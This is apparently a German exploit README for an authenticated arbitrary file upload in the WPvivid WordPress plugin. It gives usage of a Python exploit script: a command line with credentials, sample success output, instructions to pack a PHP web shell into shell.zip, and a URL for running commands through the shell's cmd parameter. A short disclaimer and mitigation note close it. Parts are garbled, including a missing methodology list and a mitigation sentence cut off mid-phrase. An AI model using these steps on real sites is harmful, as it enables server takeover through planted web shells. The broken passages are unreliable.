
Veröffentlicht: 2024-10-16 | Migration, Backup, Staging – WPvivid <= 0.9.35 - Authentifizierter (Subscriber+) beliebiger Datei-Upload
Das WPvivid-WordPress-Plugin, das für Website-Migration und Backups entwickelt wurde, ist anfällig für einen Fehler beim beliebigen Datei-Upload. Diese Schwachstelle ermöglicht es authentifizierten Benutzern mit niedrigen Berechtigungen, ZIP-Dateien hochzuladen und zu extrahieren, was möglicherweise zu Remote-Code-Ausführung (RCE) führen kann, wenn ein bösartiges Skript in den extrahierten Dateien bereitgestellt wird.
Ein Python-Exploit-Skript wurde entwickelt, um diese Schwachstelle mit der folgenden Methodik auszunutzen:
Wenn die Ausnutzung erfolgreich ist, gibt das Skript Folgendes aus:
[+] Logged in successfully.
[+] Target is vulnerable. Proceeding with exploitation.
[+] Uploading file: Success
[+] Confirming upload: Success
[+] Starting import: Success
[+] Shell uploaded successfully at: http://target-site.com/wp-content/nxploit.php
Stellen Sie sicher, dass sich eine bösartige shell.zip-Datei im selben Verzeichnis wie das Exploit-Skript befindet.
Die shell.zip-Datei sollte eine PHP-Web-Shell (e.g., nxploit.php). enthalten.
Ein gültiges WordPress-Konto mit Abonnent- oder höheren Berechtigungen ist erforderlich.
python CVE-2020-36842.py -u http://target-site.com -un username khaled -p password 123
Das Skript überprüft die Zielversion und meldet sich mit den angegebenen Anmeldedaten an.
Wenn das Ziel verwundbar ist, lädt das Skript shell.zip hoch und extrahiert sie.
Bei Erfolg stellt das Skript eine URL zur hochgeladenen Shell bereit.
Sobald die Shell erfolgreich hochgeladen und extrahiert wurde, können Sie mit ihr interagieren, indem Sie Befehle über eine URL senden:
http://target-site.com/wp-content/nxploit.php?cmd=pwd
Um diese Schwachstelle zu mindern, wird dringend empfohlen:
wp-content/uploads mithilfe von .htaccess oder Serverkonfigurationen.Diese Schwachstelle stellt ein ernstes Risiko dar, da sie authentifizierten Angreifern ermöglicht, bösartige Dateien auf einem WordPress-Server hochzuladen und auszuführen. Website-Administratoren sollten sofort Maßnahmen ergreifen, um ihre Installationen zu sichern.
Haftungsausschluss: Dieses Dokument ist ausschließlich für ethische Sicherheitsforschung und Bildungszwecke bestimmt. Das Ausnutzen von Schwachstellen ohne Erlaubnis ist illegal und wird nach geltendem Recht bestraft. ( Nxploit | Khaled_alenazi )